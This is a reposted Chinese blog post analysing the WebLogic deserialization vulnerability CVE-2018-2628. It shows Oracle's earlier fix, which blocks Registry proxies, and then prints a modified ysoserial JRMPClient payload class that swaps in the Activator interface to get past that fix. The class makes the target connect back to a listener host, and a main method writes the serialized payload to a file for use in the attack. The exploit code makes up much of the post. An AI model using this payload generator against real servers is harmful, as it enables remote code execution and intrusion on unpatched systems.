转载

Weblogic 反序列化REC(CVE-2018-2628)

Weblogic简介

WebLogic是美国Oracle公司出品的一个application server，确切的说是一个基于JAVAEE架构的中间件，WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。

参考链接： http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html

前言

2015年11月6日，FoxGlove Security安全团队的@breenmachine 发布的一篇博客[3]中介绍了如何利用Java反序列化漏洞，来攻击最新版的WebLogic、WebSphere、JBoss、Jenkins、OpenNMS这些大名鼎鼎的Java应用，实现远程代码执行。

前因

oracle公司给出的修复如下

protected Class<?> resolveProxyClass(String[] interfaces) throws IOException, ClassNotFoundException {
   String[] arr$ = interfaces;   
   int len$ = interfaces.length;   
   for(int i$ = 0; i$ < len$; ++i$) {      
       String intf = arr$[i$];      
       if(intf.equals("java.rmi.registry.Registry")) {          
          throw new InvalidObjectException("Unauthorized proxy deserialization"); 
      }   
   }   
   
   return super.resolveProxyClass(interfaces);
}

这里采用白名单的形式进行了限制，要分析这个漏洞还要从上一个说起：

public Registry getObject(String command) throws Exception {        
       int sep = command.indexOf(58);        String host;        
       int port;        
       if(sep < 0) {            
              port = (new Random()).nextInt('uffff');            
              host = command;        
       } else {            
              host = command.substring(0, sep);            
              port = Integer.valueOf(command.substring(sep + 1)).intValue();        
       }        
       ObjID id = new ObjID((new Random()).nextInt());        
       TCPEndpoint te = new TCPEndpoint(host, port);        
       UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));        
       RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref);        
       Registry proxy = (Registry)Proxy.newProxyInstance(JRMPClient.class.getClassLoader(), new Class[]{Registry.class}, obj);        
       return proxy;    
}

这个也是一个老的CVE的payload，以前是通过Registry进行rmi的注册的，由于oracle公司添加了对于这个的限制，那么是否有可替代的东西？

Weblogic 反序列化REC(CVE-2018-2628)

事实可以看出来去继承Remote方法的接口还是挺多的，据其中一个例子Activator这个类就可以做到跟Register同等效果，修改一下代码：

@PayloadTest(        
            harness = "ysoserial.payloads.JRMPReverseConnectSMTest"
)
public class JRMPClient extends PayloadRunner implements ObjectPayload<Activator> {    
       public JRMPClient() {    
       }    
       public Activator getObject(String command) throws Exception {        
             int sep = command.indexOf(58);        
             String host;        
             int port;        
             if(sep < 0) {            
                    port = (new Random()).nextInt('uffff');            
                    host = command;        
             } else {            
                    host = command.substring(0, sep);            
                    port = Integer.valueOf(command.substring(sep + 1)).intValue();        
             }        
             ObjID id = new ObjID((new Random()).nextInt());        
             TCPEndpoint te = new TCPEndpoint(host, port);        
             UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));        
             RemoteObjectInvocationHandler obj = new RemoteObjectInvocationHandler(ref);        
             Activator proxy = (Activator)Proxy.newProxyInstance(JRMPClient.class.getClassLoader(), new Class[]{Activator.class}, obj);        
             return proxy;    
      }    
      public static void main(String[] args) throws Exception {     
            Thread.currentThread().setContextClassLoader(JRMPClient.class.getClassLoader());        
            ObjectPayload payload = (ObjectPayload)JRMPClient.class.newInstance();        
            Object objBefore = payload.getObject("127.0.0.1:7779");        
            FunUtil.GeneratePayload(objBefore,"E:/Penetration/weblogic/p.dat");    
      }
}

运行后在本地生成一个p.dat文件，剩下的过程就跟以前一样